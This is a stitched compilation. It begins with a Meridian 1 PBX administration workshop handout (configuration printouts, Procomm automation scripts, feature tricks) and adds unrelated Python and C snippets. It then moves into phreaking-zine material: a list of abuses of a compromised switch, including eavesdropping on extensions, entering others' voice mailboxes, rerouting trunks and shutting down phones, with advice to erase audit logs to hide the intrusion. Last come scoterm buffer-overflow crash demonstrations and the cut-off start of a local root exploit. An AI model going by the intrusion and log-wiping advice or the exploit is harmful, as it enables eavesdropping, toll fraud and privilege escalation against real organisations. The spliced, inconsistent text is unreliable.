    LPR XRA CWD SWD MWA LPD XHD CCSD LNA TVD
    CFTD SFD C6D PDN CNID CLBD AUTU ICDD CDMD EHTD
    MCTD GPUD DPUD CFXD ARHD OVDD AGTD CLTD LDTA ASCD
    MBXD CPFA CPTA DDGA NAMA SHL ABDD CFHD USRD BNRD
    OCBD
RCO 0
PLEV 02
FTR CFW 4
DATE 28 NOV 1978

LD86 ESN - the Start of BARS
----------------------------

The ESN data block is the root of BARS. Before BARS can be set up, the ESN data block must be defined.
>ld 86
ESN000
REQ prt
CUST 0
FEAT esn

MXLC 0
MXSD 30
MXIX 0
MXDM 100
MXRL 80
MXFC 60
MXFS 0
MXSC 120
NCDP 4
AC1 9 <-- This is where "9" is defined
AC2
DLTN YES
ERWT YES
ERDT 0
TODS 0 00 00 23 59 <-- This section refers only to time of day routing controls
RTCL DIS
NCOS 0 - 0 <-- This section refers only to time of day routing controls
NCOS 1 - 1
NCOS 2 - 2
NCOS 3 - 3
NCOS 4 - 4
NCOS 5 - 5
NCOS 6 - 6
NCOS 7 - 7
NCOS 99 - 99
ETOD
TGAR NO

REQ end

ISLUA 99 Session BA 20
Capturing Data From Your Meridian 1 to Various PC Software Packages
Curt Kempf
City of Columbia, Missouri

Thanks for attending the workshop
I hope you find this information helpful
========================================

o ACD Daily Report
o Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT
o TN PRT out of Host MCA card
o Procomm Script to CHG a TN when it becomes IDLE
o Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95)
o Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alpha numeric page when received.

ACD Daily Report
================

ACD 000 1999 03 29 17:00
DAILY TOTALS REPORT

REPT 1
ACD AVG CALLS AVG AVG AVG AVG DN AVG #-XFER AVG-TIME-POSN
DN AGTS ANSWD ASA DCP PCP WORK WAIT CALLS TIME IDN ACD BUSY MANNED
7380 324 54 125 388 514 127 118 69 0 28 22085 27246
------------------------------------------------------------------------------
1 324 54 125 388 514 127 118 69 0 28 22085 27246

REPT 2
ACD CALLS RECALL ANSWERED ABANDONED TOF TOF OVER INTER
DN ACCPTED TO LONGEST NO. AVG.WT TSF IN OUT FLOW FLOW
SOURCE WT. TIME BUSY
7380 366 0 476 43 88 80 0 0 8 0
------------------------------------------------------------------------------
1 366 0 476 43 88 80 0 0 8 0

REPT 4
POS CALLS AVG AVG AVG DN INC DN OUT #-XFER BUSY MANNED
ID ANSWD DCP PCP WAIT INC TIME OUT TIME IDN ACD TIME TIME
ACD DN 7380
301 81 136 115 142 3 66 12 352 0 9 20716 32208
303 57 91 261 139 4 478 15 652 0 4 20788 28702
309 49 90 2 182 0 0 1 100 0 7 4550 13466
304 87 128 127 108 1 60 12 564 0 6 22662 32088
305 39 185 108 73 0 0 2 96 0 1 11464 14302
308 0 ***** ***** ***** 15 1770 20 1464 0 0 32256 32400
306 0 ***** ***** ***** 9 2950 13 1660 0 0 32400 32400
312 11 145 2686 50 4 286 7 416 0 1 31848 32400
------------------------------------------------------------------------
8 324 125 388 127 36 93 82 88 0 28 2945 3633

Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT
====================================

; ProComm script by Chris Fourroux & Curt Kempf/City of Columbia - tested
; with ProComm Plus 32 95/NT, version 4. Script to capture ACD reports to
; disk with the format XXXXXX.txt, where XXXXXX is month day year. Script
; waits for "ACD DN 7380" to occur, which is on every hourly report, then
; closes and appends the newest statistics to MMDDYY.TXT file.

string cmd="ncopy c:\capture\"
string szFileName = $DATE
string szDate = $DATE
integer Pos = 0

proc main
   dial data "Option 61"
   set capture overwrite OFF          ; if capture file exists, append data to it.
   capture off                        ; close capture file if it is open
   when TARGET 0 "ACD DN 7380" call CLOSECAP
Startloop:
   clear                              ; clear contents of screen and scroll back buffer
   szFileName = $DATE
   szDate = $DATE
   while 1
      if nullstr szFileName           ; Check to see if we've reached
         exitwhile                    ; the end of source string
      endif                           ; and if so, exit loop.
      if strfind szFileName "/" Pos   ; Check for char
         strdelete szFileName Pos 1   ; and delete it
      else
         exitwhile                    ; exit if no more characters
      endif
   endwhile
   strcat szFileName ".txt"
   set capture file szFileName        ; Set name of capture file.
   capture on                         ; Open up the capture file.
   while strcmp $DATE szDate          ; Loop while date is the same
   endwhile                           ; or if the date changes,
   capture off                        ; Close the capture file.
   goto Startloop                     ; and start a new one.
endproc

proc closecap
   pause 3
   strcat cmd szFileName              ; Append to variable "CMD"
   strcat cmd " h:\uab\"              ; Append network drive to "CMD"
   transmit "^M***********^M"         ; Put in asterisks between hourly reports
   capture off                        ; Close capture file
   pause 5
   DOS cmd HIDDEN i0                  ; Run "CMD" in DOS and copy file to the LAN
   pause 10
   taskexit i0                        ; Exit DOS window
   pause 10
   cmd="ncopy c:\capture\"            ; Reset "CMD"
   capture on                         ; Turn Capture back on.
Endproc

Procomm Screen of dialing up the host MCA card(direct connect 9600 baud)
=====================================

ENTER NUMBER OR H (FOR HELP): 2206
CALLING 2206
RINGING
ANSWERED
CALL CONNECTED. SESSION STARTS
logi
PASS?
TTY #02 LOGGED IN 08:59 11/4/1999
>

TN PRT out of Host MCA card

DES 2206
TN 020 0 04 31 ;note TN is TN of voice set(20 0 4 15) +(plus) 16
TYPE 2616
CDEN 8D
CUST 0
AOM 0
FDN
TGAR 1
LDN NO
NCOS 2
SGRP 0
RNPG 0
SCI 0
SSU
XLST
SCPW
CLS CTD FBD WTD LPR MTD FND HTD ADD HFD MWD
    AAD IMD XHD IRD NID OLD DTA DRG1 POD DSX
    VMD CMSD CCSD SWD LND CNDD CFTD SFD DDV CNID
    CDCA ICDD CDMD MCTD CLBD AUTU GPUD DPUD DNDD CFXD
    ARHD FITD CLTD ASCD CPFA CPTA ABDD CFHD FICD NAID
    DDGA NAMA USRD ULAD RTDD PGND OCBD FLXD FTTU
TOV 0 MINS
DTAO MCA
PSEL DMDM
HUNT
PSDS NO
TRAN ASYN
PAR SPACE
DTR OFF
DUP FULL
HOT OFF
AUT ON
BAUD 9600
DCD ON
PRM HOST ON
VLL OFF
MOD YES
INT OFF
CLK OFF
KBD ON
RTS ON
PLEV 02
AST
IAPG 0
AACS NO
ITNA NO
DGRP
DNDR 0
KEY 00 SCR 2206 0 MARP
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
DATE 30 DEC 1997

Very rarely, I can not dial up the host MCA card. It simply won't answer, so the following usually clears it up:

ITEM ITEM OPE YES DCD ON PRM OFF

If that doesn't work, since 020 0 04 31 is "digital", it could be disabled. LD 32 and ENLU it.
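Once printouts have been captured to a file as in the session material above, the audit's NCTL and RLB review items ("Does NCOS X always equal FRL X?", "Are any RLB ENTRs assigned FRL 0?") and the telephone block's question "NCOS 5, what FRL does this equal?" can be checked mechanically. The following is an added example, not part of the audit document or the workshop scripts; the function names are assumptions, and the sample text is abridged from the LD87 NCTL and LD86 RLB printouts shown earlier.

```python
import re

# Constructed sample input, abridged from the LD87 NCTL and LD86 RLB printouts
# reproduced on this page; only the prompts the checks read are kept.
NCTL_CAPTURE = """\
FEAT nctl
NRNG 0 7
---------------
NCOS 0
FRL 0
NCOS 2
FRL 0
NCOS 3
FRL 3    <-- NCOS 3 equals FRL 3.
NCOS 5
FRL 5
NCOS 6
FRL 6    <-- NCOS 6 equals FRL 6.
"""

RLB_CAPTURE = """\
FEAT rlb
RLI 11
RLI 11
ENTR 0    <-- This is the list's first "Entry Number"
ROUT 15
FRL 3
DMI 10
ENTR 1
ROUT 9
FRL 6
DMI 0
ISET 2
MFRL 3
"""


def _fields(capture):
    """Yield (prompt, value) pairs, dropping '<--' annotations and rule lines."""
    for raw in capture.splitlines():
        m = re.match(r"([A-Z0-9_]+)\s+(\S.*)$", raw.split("<--")[0].strip())
        if m:
            yield m.group(1), m.group(2).strip()


def parse_nctl(capture):
    """Return {NCOS: FRL} from an LD87 NCTL printout."""
    table, ncos = {}, None
    for key, val in _fields(capture):
        if key == "NCOS" and val.isdigit():   # skips ESN lines like "NCOS 0 - 0"
            ncos = int(val)
        elif key == "FRL" and ncos is not None and val.isdigit():
            table[ncos] = int(val)
    return table


def parse_rlb(capture):
    """Return {RLI: [entry, ...]} from an LD86 RLB printout."""
    lists, rli, entry = {}, None, None
    for key, val in _fields(capture):
        if key == "RLI" and val.isdigit():
            rli, entry = int(val), None       # the prompt echo repeats the RLI
            lists.setdefault(rli, [])
        elif key == "ENTR" and rli is not None and val.isdigit():
            entry = {"ENTR": int(val)}
            lists[rli].append(entry)
        elif key in ("ROUT", "FRL", "DMI") and entry is not None and val.isdigit():
            entry[key] = int(val)
    return lists


def ncos_frl_mismatches(nctl):
    """Audit item 'Does NCOS X always equal FRL X in the NCTL?'"""
    return [(n, f) for n, f in sorted(nctl.items()) if n != f]


def frl0_entries(rlb):
    """Audit item 'Are any RLB ENTRs assigned FRL 0?' -> [(RLI, ENTR), ...]"""
    return [(rli, e["ENTR"]) for rli, ents in sorted(rlb.items())
            for e in ents if e.get("FRL") == 0]


def reachable_routes(ncos, rli, nctl, rlb):
    """Trunk routes a set with this NCOS may use on a route list.
    An NCOS that is not defined in the NCTL has no capability."""
    frl = nctl.get(ncos)
    if frl is None:
        return []
    return [e["ROUT"] for e in rlb.get(rli, [])
            if "ROUT" in e and "FRL" in e and e["FRL"] <= frl]


if __name__ == "__main__":
    nctl, rlb = parse_nctl(NCTL_CAPTURE), parse_rlb(RLB_CAPTURE)
    print("NCOS/FRL mismatches to review:", ncos_frl_mismatches(nctl))
    print("RLB entries open to FRL 0:", frl0_entries(rlb))
    print("Routes for NCOS 5 on RLI 11:", reachable_routes(5, 11, nctl, rlb))
```

On the page's own data this reports NCOS 2 mapped to FRL 0 as the one pair to confirm, and shows that the sample telephone (NCOS 5) reaches only the first-choice route on RLI 11.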
Procomm Script to CHG a TN when it becomes IDLE
===============================================

string TN                                 ;TN
string TIPE                               ;TYPE, however word is reserved in ASPECT
string EYETEM                             ;ITEM, ditto above.
string szList                             ;List of items.
string szItem                             ;Item selected from list.
integer Event                             ;Dialog box event.
integer Num                               ;integer value

proc MAIN
   set txpace 50                          ;delay for keyboard
   when TARGET 0 "IDLE" call CHGIT        ;when receive IDLE, go change set.

   ;Input the TN, TYPE, and ITEM
   sdlginput "LD 11, CHG when IDLE :-)" "Enter TN: " TN
   if strcmp TN ""                        ; compare to see if NULL?
      halt                                ;if enter is pressed, halt script.
   else
   endif

   ; Display dialog box with list of items.
   ; Pick if set is a 500, 2008, or 2616
   szList = "2616,2008,500"
   dialogbox 0 55 96 100 74 11 "LD 11, CHG when IDLE :-)"
      listbox 1 5 5 90 40 szList single szItem
      pushbutton 2 28 52 40 14 "&Exit" ok default
   enddialog

   while 1
      dlgevent 0 Event                    ; Get the dialog event.
      switch Event                        ; Evaluate the event.
         case 0                           ; No event occurred.
         endcase
         case 1
            if strcmp szItem "2616"
               tipe = "2616"
            else
               if strcmp szItem "2008"
                  tipe = "2008"
               else
                  if strcmp szItem "500"
                     tipe = "500"
                  endif
               endif
            endif
         endcase
         default                          ; Exit case chosen.
            exitwhile
         endcase
      endswitch
   endwhile
   dlgdestroy 0 CANCEL                    ; Destroy the dialog box.

   sdlginput "LD 11, CHG when IDLE :-)" "ITEM: (IE: CLS HTA)" EYETEM
   Transmit "LD 11^M"                     ;Go in to overlay 11
   Waitfor "REQ"
   for Num = 0 upto 100                   ;Keep STAT'n til IDLE
      Transmit "STAT "
      Transmit TN
      Transmit "^M"
      pause 10                            ; wait 10 seconds
   endfor
endproc

PROC CHGIT
   Transmit "CHG^M"                       ;Go change the set, then halt the script.
   Waitfor "TYPE"
   Transmit TIPE
   pause 1                                ;pause 1 second
   Transmit "^M"
   Waitfor "TN"
   Transmit TN
   Transmit "^M"
   Waitfor "ECHG"
   Transmit "YES^M"
   Waitfor "ITEM"
   Transmit EYETEM
   Transmit "^M"
   waitfor "ITEM"
   transmit "^M"
   Waitfor "REQ:"
   Transmit "END^M"
   halt
endproc

Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95)
===============================================================

integer flag=0                            ;set flag

proc main
   set txpace 100                         ;delay for keyboard
   when TARGET 1 "SCH2115" call LD95NEW   ;wait for 'name does not exist' error
                                          ;open text file that has a list of
                                          ;DNs & NAMEs you want to change/add.
   fopen 1 "C:\phone\chgnames.txt" READ   ;chgnames.txt is in the format of
                                          ; 7354, Jane Doe
                                          ; 6745, John Smith
                                          ; 7645, Dan White
                                          ;script doesn't care if the NAME is NEW or CHG
   if failure
      usermsg "could not open the file."
   else
      Transmit "LD 95^M"                  ;Go in to overlay 95
      Waitfor "REQ"
      Transmit "CHG^M"
      Waitfor "TYPE"
      Transmit "NAME^M"
      Waitfor "CUST"
      Transmit "0^M"
      Waitfor "DIG"
      Transmit "^M"
      fseek 1 0 0
      while 1
         fgets 1 s0
         if FEOF 1
            exitwhile
         endif
         strtok s1 s0 "," 1
         strtok s2 s0 "," 1
         DelStr (&s1)
         DelStr (&s2)
         DelLineFeed (&s2)
         ;strfmt s4 "TN: %s" s1           ;uncomment these two for
         ;usermsg s4                      ;troubleshooting the script
         strlen s1 i0
         if (i0 > 2)
            LD95CHG ()
         else
            Transmit "****^M"
            halt
         endif
      endwhile
   endif
endproc

proc LD95CHG
   Waitfor "DN"
   Transmit s1
   Transmit "^M"
   pause 1
   if FLAG==1
      FLAG=0
      Transmit "^M"
      return
   else
      Transmit s2
      Transmit "^M"
      Waitfor "DISPLAY_FMT"
   endif
endproc

proc LD95NEW
   FLAG=1
   Transmit "^M"
   Transmit "**^M"
   Waitfor "REQ"
   Transmit "NEW^M"
   Waitfor "TYPE"
   Transmit "NAME^M"
   Waitfor "CUST"
   Transmit "0^M"
   Waitfor "DIG"
   Transmit "^M"
   Waitfor "DN"
   Transmit s1
   Transmit "^M"
   Waitfor "NAME"
   Transmit s2
   Transmit "^M"
   Waitfor "DISPLAY_FMT"
   Transmit "^M"
   Waitfor "DN"
   Transmit "^M"
   Waitfor "REQ"
   Transmit "CHG^M"
   Waitfor "TYPE"
   Transmit "NAME^M"
   Waitfor "CUST"
   Transmit "0^M"
   Waitfor "DIG"
endproc

proc DelStr
   param string szStr
   integer Pos
   while 1
      if StrFind szStr "`"" Pos
         StrDelete szStr Pos 1
      else
         exitwhile
      endif
   endwhile
endproc

PROC DelLineFeed
   param string szStr
   integer Pos
   strlen szStr Pos
   if (Pos > 2)
      StrDelete szStr (Pos-1) 1
   endif
endproc

You could very easily modify this script to say, change an ASCII list of TNs/TYPEs to TGAR 1, and have it executed at 2:00 a.m. The s0 and s1 variables would change from DN & NAME, to TN & TYPE, and add Waituntil "2:00:00" "7/16/99" to kick it off at 2:00 a.m.

Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alpha numeric page when received.
=======================================================================

proc Main
#DEFINE pagernum "235.5334"               ;Enter your pager number here.
   string szName="OPT61.cap"              ;Name of text file to capture to.
   string passw
   when TARGET 1 "DTA021" call DTA021     ;what do you want to 'wait for' ?
   when TARGET 2 "INI0" call INI0
   when TARGET 3 "PWR01" call PWR0
   set capture file szName
   capture on
   set txpace 150                         ;delay for keyboard
   HANGUP
   Dial DATA "MCA"
   transmit "^M"
   waitfor "HELP):"
   transmit "2206^M"
   waitfor "SESSION STARTS"
   while $CARRIER
      transmit "****"
      pause 1
      transmit "LOGI^M"
      waitfor "PASS?"
      sdlginput "Security" "Password: (all caps!)" passw MASKED
      if stricmp passw "sss"              ;to bypass logging in.
         transmit "*"
         call loggedin
      endif
      transmit passw
      transmit "^M"
      pause 2
   endwhile
   set txpace 1
endproc

proc DTA021
   pageA()                                ;dial paging provider
   TRANSMIT "Digital Trunk Diagnostic. Frame alignment persisted for 3 seconds^M" ;send specific x11 error to pager
   pageB()                                ;end connection to provider
   mcacard()                              ;connect back to Option 61
endproc

proc INI0
   pageA()
   TRANSMIT "An initialization has taken place.^M"
   pageB()
   mcacard()
endproc

proc PWR0
   pageA()
   TRANSMIT "Power failure from power and system monitor.^M"
   pageB()
   mcacard()
endproc

proc mcacard
   HANGUP
   PAUSE 2
   Dial DATA "MCA"                        ;Connect up to option 61 through MCA card.
   while $DIALING
   endwhile
   transmit "^M"
   pause 1
   transmit "^M"
   waitfor "HELP):"
   transmit "2206^M"
   waitfor "SESSION STARTS"
   pause 1
   when RESUME
   call loggedin
   loggedin()
endproc

proc loggedin
   while $CARRIER                         ;wait for errors to occur. Continue to do your MACs etc..
   endwhile
endproc

proc pageA
   when SUSPEND
   set port dropdtr on
   pause 1
   hangup                                 ;hangup Option 61 connection
   pause 2
   hangup                                 ;release mca card from COM port
   set port dropdtr off
   pause 1
   Dial DATA "TriStar"                    ;Dial your paging provider
   while $DIALING
   endwhile
   TRANSMIT "^M"                          ;TAPI protocol, M puts in manual mode.
   WAITFOR "ID="
   TRANSMIT "M^M"
   WAITFOR "Enter pager"
   TRANSMIT pagernum
   TRANSMIT "^M"
   WAITFOR "Enter alpha"
endproc

proc pageB
   TRANSMIT "^M"
   WAITFOR "More Pag"
   TRANSMIT "^M"
   pause 2
endproc

Little Known Meridian 1 Features And Programming Tricks
=======================================================

HELP and Error Lookup

HELP - Type " ? " at many prompts
LOOKUP - At " > " sign, type ERR AUD028 to find out what AUD028 indicates. At any other prompt, type " ! ", then you will receive " > " symbol for getting ERR lookup.

Find Sets with a Certain Feature
================================

LD81
REQ LST
FEAT CFXA
FEAT UNR

Lists all sets that have the "Call Forward External Allow" feature, then lists all UNR sets.

Inventory and Identification Commands
=====================================

LD32 IDU l s c u (or) IDC l s c
LD22 CINV (and) ISSP
LD30 UNTT l s c u

Speed Call Stuff
================

Create many Speed Call lists at once.
LD18 REQ: NEW 100 - Creates 100 lists.
When memory is plentiful, make Speed Call list number the same as the person's DN. Need to increase MSCL in LD17
Find a "Controller" in LD81 by: REQ:LST, FEAT:SCC, then the Speed List Number

Allow Restricted Sets to Dial Certain Long Distance Numbers.
============================================================

Add the numbers to a System Speed Call List. Assign an NCOS to the "List" that replaces the user's NCOS during the call.
Alternate: Add the suffix of the telephone number to an ARRN list in the prefix's RLI. This will point only that number to a new RLI with a lower (or higher if you choose) FRL.
Look up ARRN in LD86

PBX Clock Fast or Slow?
=======================
LD2  SDTA X Y -- x y
X = 0 for "subtract time each day" -or- 1 for "add time each day"
Y = 0-60 seconds to be added or subtracted each day.
Daylight Savings Question? TDST
Look this one up in LD2 before changing

Phantom DNs, TNs, and "MARP to Voice Mail" TNs
==============================================
Phantom TN with FTR DCFW
ACD Queues with NCFW but no Agents
2616 Sets with AOMs (AOMs can be in "software", but do not need to be "installed" on the set). This is an excellent "MARP TN" for DNs that need to HUNT/FDN to Voice Mail

Digit Display on Trunk Routes and ACD Queues
============================================
Find Trunk Route Access Codes - name in LD95 like any other DN
ACD Numbers - name in LD95 like any other DN
IDC Numbers - name in LD95 at DCNO prompt.
Limited Access Passwords
========================
Print PWD in LD22 before starting
LD17
LAPW 01
PW01 12345
OVLA 10 11 20

Identify Trunks, Routes and TTY Ports with "DES" Entry
======================================================
LD17  ADAN  DES can be 1-16 characters
LD16  RDB   DES can be 1-16 characters
LD14  TRK   DES can be 1-16 characters
            TKID - enter telephone number

Free Up or Block DN Range
=========================
Change your SPRE Code to 4 digits
LD15 - SPRE XXXX
Assign all current feature codes as Flexible Feature Codes
To hide DNs from appearing in LUDN printouts, enter DN prefix ranges as an FFC for "Ring Again Activate"

Save "Call Forward" Status upon Reload/Sysload
==============================================
LD17  CFWS YES

Call Waiting "Buzz" on Digital Sets is Not Long Enough
======================================================
Turn on Flexible Incoming Tones Allowed
LD15   OPT SBA DBA
LD 11  CLS FITA

"DSP" Display Key Applications
==============================
You're on the phone, another call comes in... Press DSP, then the ringing line to see who's calling.
Press DSP, then Speed Call, then entry number to view entries.
Rls23 Update - automatic Display  CLS TDD

NHC - No Hold Conference
========================
With NHC, the other party is not placed on hold while adding conferees.
You can also disconnect a conferee called with NHC
LD11  KEY X NHC
Rls23 Update - Conf. Display/Disconnect
LD11  CLS CDCA

Call Forward Indication on 2500 Sets
====================================
Add Call Forward Reminder Tone. Special dial tone is heard only when call forwarded.
LD15  OPT CFRA

Override Call Forwarded Phone
=============================
Add Flexible Feature Code for "CFHO". Dial CFHO code, then dial extension.
LD57  CODE CFHO
On sets needing ability to perform override  CLS CFHA

Call Forward ONLY Internal Calls - Let Externals Ring
=====================================================
Great when you need to prioritize external callers.
LD11  KEY X ICF 4 ZZZZ

"Delayed" Ring on Multiple Appearance DNs
=========================================
Non-ringing (SCN) keys will ring after a certain duration. Great for areas where many of the same DNs appear.
LD11  DNDR X  (X = 0-120 seconds of delay before SCN keys will start to ring)

Audible Reminder of Held Calls
==============================
Receive "buzz tone" every X seconds to remind the user that a call is on hold.
Also reminds the user that a Conference/Transfer was mishandled - the call was never transferred
LD15  DBRC X  (X = 2-120 seconds between reminders)
LD11, CLS ARHA

Which Call "On Hold" is Mine
============================
Exclusive Hold sets held calls to "wink" at the holding set, but stay "steady" at other sets.
LD10/11  CLS XHA

Change Ring Cadence/Tone
========================
There are 4 ring styles, adjusted in the CLS of the digital set.
LD11  CLS: DRG1 -or- DRG2 -or- DRG3 -or- DRG4
Set pesky customer phones to DRG4 !

BFS - Nightmare in Shining Armor ?
==================================
BFS Keys allow the user to monitor the Call Forward and busy status of a set, activate and deactivate Call Forward, and can be used as an Autodial key.
NOTE: Cannot perform MOV command with BFS. User can also forward sets by accident.
LD11  Key XX BFS l s c u  (target set's TN)

More Than 4 DNs Answered by One Mailbox?
========================================
Add up to 3 DNs to the DN list in mailbox programming.
Add the 4th and all additional DNs in the "Voice Service DN" (VSID) Table and set to "EM" to the mailbox.

1 Single Line Telephone, 3 DNs, 3 Users, 3 Mailboxes? How?
==========================================================
Create one 2500 set with one of the three DNs.
Create 2 Phantom TNs, each one with a new DN, and DCFW each of them to the 2500 set's DN (from above)
Add the three mailboxes… now any of the three numbers will ring the one set, but messages will be separated!
Change An NCOS After Hours
==========================
Here's an excerpt from the LD86 ESN data block that has NCOS 3 & 4 change to NCOS 2 after 4:30PM and all day on weekends

AC1   9
AC2
DLTN  YES
ERWT  YES
ERDT  0
TODS  0  06 00  16 29
      7  00 00  05 59
      7  16 30  23 59
RTCL  YES
NCOS 0 - 0
NCOS 1 - 1
NCOS 2 - 2
NCOS 3 - 2
NCOS 4 - 2
NCOS 5 - 5

Oops..the Console Went Into NITE...During the DAY!
==================================================
Use NITE entries that are based on "Time of Day". See Night Service in the Features Book
If the console goes into NITE during the day, send callers to either a set of DNs next to the console, or a voice menu/thru-dialer explaining that there are "technical difficulties". After hours, NITE calls go to where they should.

Just Two Security Tricks
========================
Create SPNs in BARS of: 000 thru 009 and create a Route List Block for them with LTER=YES
Now when Phreakers ask for extn 9000, they get nobody.
Use the FLEN entry on SPNs 0, 00, 011 so that nobody can transfer a caller to 9011, 90, etc.

Break Into Meridian Mailbox?
============================
Simply make the mailbox "Auto-logon". For remote access, add their DN to your set.
Convenient if you need to access an employee's mailbox without changing their password.
Useful for modifying the greetings of an absent employee or allowing a temporary employee access to a mailbox without divulging the regular employee's password.

Tracing Phone Calls
===================
TRAC 0 XXXX        (X=extension)
TRAC l s c u
TRAC l s c u DEV   (Adds BARS info)
TRAT 0 X           (X=Console number)
TRAD               (see book, traces T1 channels)
ENTC               (see book, traces TN continuously - up to 3 TNs at a time ! )

Forgot your M3000 Directory Password?
=====================================
LD32  CPWD l s c u

Another Idea
============
Use a PC to log into your PBX, then activate the "capture file". Now run a TNB and keep it as a file rather than on paper.
If your TNB file is large, try a high power text editor, which can open even 20meg files in seconds. Search the Internet "Text Editor"
Keep copies so you can go back and see how a set was programmed when you out it by mistake.
*/

Using the above information you could successfully do the following:

a) Setup your own trunk configurations that allow outgoing calls.
b) Reset lines and trunks, reconfigure lines and trunks.
c) Set an internal extension(s) to share the same multiplexed trunk as you so you can effectively listen in on any incoming/outgoing phone call made on that extension.
d) Set up calls that don't exist with no trunk assignment.
e) Set any user's voicemail box with auto-logon parameters temporarily.
f) Close down the entire network
g) Set every phone in the company to ring forever...
h) Re-route incoming/outgoing trunk calls to any destination.
i) Park your own incoming line as "on console" so you can answer calls made to a pre-set extension.
j) Make yourself the company operator.
k) Trace phonecalls, audit logs etc.
l) Set all trunks to loopback on one another.
m) Anything you want?

That's just a few ideas. But before you do ANYTHING, you should be aware that anything you do could have devastating impact on the company's phone switch. For example, say you accidentally commanded the system to shut down.. You would effectively be killing 6000+ people's phone lines, which would yield colossal financial burden/loss onto the company. Generally I'm just saying, be nice.. Just because you have the power to do such things, it doesn't mean you have to do it. :)

A final note: In the aftermath of obtaining access to a meridian switch, it is generally advisable to erase all trace of you ever being on there. This can be achieved by resetting trunk audit logs, and erasing any log of your incoming trunk setups. Therefore, if the real admin decided to track what was going on he/she would get nowhere because the lines you used to initially call into the system DO NOT EXIST.
It's just a case of using your imagination. Don't be destructive, Don't alter anything that would be noticed, Generally don't be a f00l..

That's the end of this file, I hope you enjoyed it. Take it easy.

Shouts to D4RKCYDE, NOU!, b4b0, 9x, subz, pbxphreak, lusta, gr1p, LINEMANPUNX.

. .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
. .. ... .......... http://hybrid.dtmf.org ......... ... .. .

. : |
+-+[ SCO buffer overflow lameness ]+---> by darkraver <----------------------+
+-+[ D4RKCYDE ]+---> <----------------------+
| : .

SCO patches lameness
--------------------
The Dark Raver

I installed a good SCO OpenServer 5.0.4 on my box some months ago and spent some time playing with it and coding some exploits. Some of my friends have been testing these exploits on other machines and, surprisingly, some of them have told me that some of the bugs exploited were still present in the patched binaries of SCO. I knew that Sun and SGI had shipped some patches that didn't work correctly, but I couldn't imagine SCO doing the same thing.

For example, the old well known scoterm bug:

-------------------------------------------------
$ /usr/bin/X11/scoterm.old -display `a 10000`
Error: Can't open display: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$ /usr/bin/X11/scoterm.old -geometry `a 10000`
Segmentation Fault (core dumped)
$ /usr/bin/X11/scoterm.old -fg `a 10000`
Segmentation Fault (core dumped)
$ /usr/bin/X11/scoterm.old -bg `a 10000`
Segmentation Fault (core dumped)
-------------------------------------------------

A lot of overflows...
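The test runs above show four options each taking an unbounded value, and the article's complaint is that a patch can leave some of those paths open. As an added illustration (not code from the article or from SCO), here is one way an option handler can push every value-taking option through the same bounded path, together with a regression probe that replays the 10000-byte input against each option. The 128-byte cap, the COLSxROWS[{+-}X{+-}Y] grammar and all function names are assumptions made for the example.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OPT_MAX 128   /* assumed cap on any one option value */
struct geometry { long cols, rows, off[2]; int neg[2]; };
static const char *const OPTS[] = { "-display", "-geometry", "-fg", "-bg" };
#define NOPTS ((int)(sizeof OPTS / sizeof OPTS[0]))

/* Copy src into dst only if it fits with its terminator; -1 otherwise. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (src != NULL && n < dstsz && src[n] != '\0')
        n++;
    if (src == NULL || n >= dstsz)
        return -1;               /* too long: refuse rather than truncate */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Parse a decimal field in [lo, hi] and advance *p past it. */
static int parse_field(const char **p, long lo, long hi, long *out)
{
    char *end;
    if (**p < '0' || **p > '9')
        return -1;
    errno = 0;
    *out = strtol(*p, &end, 10);
    if (errno == ERANGE || *out < lo || *out > hi)
        return -1;
    *p = end;
    return 0;
}

/* Strict parser for COLSxROWS[{+-}X{+-}Y]; 0 on success, -1 on reject. */
int parse_geometry(const char *arg, struct geometry *g)
{
    char buf[OPT_MAX];
    const char *p = buf;
    int i;
    if (copy_bounded(buf, sizeof buf, arg) != 0)
        return -1;
    memset(g, 0, sizeof *g);
    if (parse_field(&p, 1, 1000, &g->cols) != 0 || (*p != 'x' && *p != 'X'))
        return -1;
    p++;
    if (parse_field(&p, 1, 1000, &g->rows) != 0)
        return -1;
    for (i = 0; i < 2 && *p != '\0'; i++) {
        if (*p != '+' && *p != '-')
            return -1;
        g->neg[i] = (*p++ == '-');
        if (parse_field(&p, 0, 32767, &g->off[i]) != 0)
            return -1;
    }
    return (*p == '\0' && i != 1) ? 0 : -1;   /* no offsets, or both */
}

/* Run every value-taking option through the same bounded path.
 * Returns 0 if all values pass, else the argv index of the bad value. */
int validate_args(int argc, char **argv)
{
    char value[OPT_MAX];
    struct geometry g;
    int i, k;
    for (i = 1; i < argc; i++) {
        for (k = 0; k < NOPTS && strcmp(argv[i], OPTS[k]) != 0; k++)
            continue;
        if (k == NOPTS)
            continue;            /* not one of the options checked here */
        if (++i >= argc)
            return i;            /* option given without a value */
        if (k == 1 ? parse_geometry(argv[i], &g) != 0
                   : copy_bounded(value, sizeof value, argv[i]) != 0)
            return i;
    }
    return 0;
}

/* Regression probe: n filler bytes (constructed) as the value of opt. */
int probe_long_value(const char *opt, size_t n)
{
    static char big[16384];
    char *argv[3] = { "scoterm", (char *)opt, big };
    if (n >= sizeof big)
        return -1;
    memset(big, 'a', n);
    big[n] = '\0';
    return validate_args(3, argv);
}

int main(void)
{
    for (int k = 0; k < NOPTS; k++)
        printf("%s: %d\n", OPTS[k], probe_long_value(OPTS[k], 10000));
    return 0;
}
```

A result of 2 from the probe means the oversized value at argv[2] was rejected; running the probe over every option after a fix is what catches a patch that closed only one of the paths.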
And one of my first exploits, exploiting the -geometry overflow:

-------------------------------------------------
/*
 * Local root exploit
 *
 * Offset: scoterm (SCO OpenServer 5.0.4)
 * 0 -> From an open scoterm (without display parameter)
 * 2500 -> From remote telnet (with display parameter)
 *
 * Usage:
 * $ cc scotermx.c -o scotermx
 * $ scoterm
